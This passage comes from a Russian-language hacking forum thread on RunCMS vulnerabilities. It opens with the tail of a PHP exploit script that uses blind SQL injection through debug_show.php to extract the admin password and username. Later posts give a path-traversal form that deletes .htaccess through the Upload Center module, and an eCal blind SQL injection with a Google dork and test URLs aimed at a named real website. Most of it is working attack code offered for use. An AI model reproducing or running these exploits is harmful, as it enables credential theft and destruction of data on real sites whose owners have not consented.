    $executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
                
    $sql=urlencode(serialize($executed_queries));
                
    $sql=str_replace("%22","%2522",$sql);//you know, urldecode()...
                
    $data ="debug_show=show_queries";
                
    $data.="&executed_queries=".$sql;
                
    $data.="&sorted=1";
                
    $packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
                
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
                
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
                
    $packet.="Host: ".$host."\r\n";
                
    $packet.="Content-Length: ".strlen($data)."\r\n";
                
    $packet.="Pragma: no-cache\r\n";
                
    $packet.="Connection: Close\r\n\r\n";
                
    $packet.=$data;
                
    send($packet);
                if (
    eregi("_users&nbsp;</td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;}
            }
            if (
    $i==255) {die("Exploit failed...");}
      }
      
    $j++;
    }
    echo 
    "\n";

    echo 
    "admin username -> ";
    $j=1;$admin_user="";
    while (!
    strstr($admin_user,chr(0))){
        for (
    $i=0$i<=255$i++){
            
    $executed_queries=array();
            
    $executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1";
            
    $sql=urlencode(serialize($executed_queries));
            
    $sql=str_replace("%22","%2522",$sql);
            
    $data ="debug_show=show_queries";
            
    $data.="&executed_queries=".$sql;
            
    $data.="&sorted=1";
            
    $packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n";
            
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
            
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
            
    $packet.="Host: ".$host."\r\n";
            
    $packet.="Content-Length: ".strlen($data)."\r\n";
            
    $packet.="Pragma: no-cache\r\n";
            
    $packet.="Connection: Close\r\n\r\n";
            
    $packet.=$data;
            
    send($packet);
            if (
    eregi("_users&nbsp;</td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;}
        }
        if (
    $i==255) {die("Exploit failed...");}
        
    $j++;
    }
    ?>


    original url: http://retrogod.altervista.org/runcms_152_sql.html
     
  18. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Как узнать версию ?

    /index.php
    PHP:
    <meta name="robots" content="index, follow" />
    <
    meta name="generator" content=" RUNCMS 1.5.3 (build 20071016)" />
    <
    meta name="keywords" content="enter your keywords here" />
    <
    meta name="description" content="Enter your site description here" />
     
  19. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    RunCMS Module Upload Center Delete File Vulnerability

    version: latest -- 1.01

    Showing list files Vulnerability

    Vuln Code:
    /folder.php
    PHP:
    function listfiles() {
    global 
    $ucConfig$xoopsUser$_GET;

    if (!
    $xoopsUser) {
      
    header("Location:".XOOPS_URL."/whyregister.php");
    }
    else {

    $foldername    $_GET['foldername'];
    $userfoldername $xoopsUser->getVar("uid");
    $userfolderpath "./cache/files/".$userfoldername;
    $imgurl         XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername;
    $imgpath        "./cache/files/".$userfoldername."/".$foldername;

    $subfolderpath  $userfolderpath."/".$foldername;

    $total dir_stats($userfolderpath);
    .....
    Delete File Vulnerability

    Vuln Code:
    /folder.php
    PHP:
    function deletefile() {
    global 
    $xoopsUser$_POST;

    $filename $_POST['filename'];
    $foldername           $_POST['foldername'];
    $userfoldername   $xoopsUser->getVar("uid");

        if ( @
    file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) {
            @
    unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename);
            
    redirect_header("folder.php?op=listfiles&foldername=".$foldername3_MD_FILEDELETEOK);
            
        }
        
    }

    Code:
    <form action="folder.php" method="post"><td width="1%" nowrap><input type="hidden" name="op" value="deletefile" />
    <input type="hidden" name="foldername" value="[COLOR=Yellow]../../../../../[/COLOR]" /><input type="hidden" name="filename" value="[COLOR=Yellow].htaccess[/COLOR]" />
    <input type="submit" class="button" value="Delete"></td></form>

    ZAMUT ©
     
    #19 Roba, 21 Jul 2008
    Last edited: 21 Jul 2008
  20. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Уязвимости модулей RunCMS

    RunCMS Module eCal 2.4 Blind-SQL

    Уязвимый продукт: Module eCal
    Версия: <= 2.4
    Линк: http://www.runcms.ru/modules/files/showfile.php?lid=95
    Дорк: "inurl:modules/ecal/"

    Blind-SQL

    Уязвимость в файле localleve.php.
    Уязвимый кусок кода:
    PHP:
    $query $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE stamp >= \"$currentyear-$currentmonth-$currentday 00:00:00\" AND locationid =$lid AND valid ='yes' ORDER BY stamp");
    $kat1 $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");
    Exploit:
    Code:
    true: /modules/ecal/localleve.php?lid=1+and+1=1
    false: /modules/ecal/localleve.php?lid=1+and+1=2
    Example:
    Code:
    true: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=5
    false: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=4
    
     
    #20 Ded MustD!e, 16 Dec 2008
    Last edited: 16 Dec 2008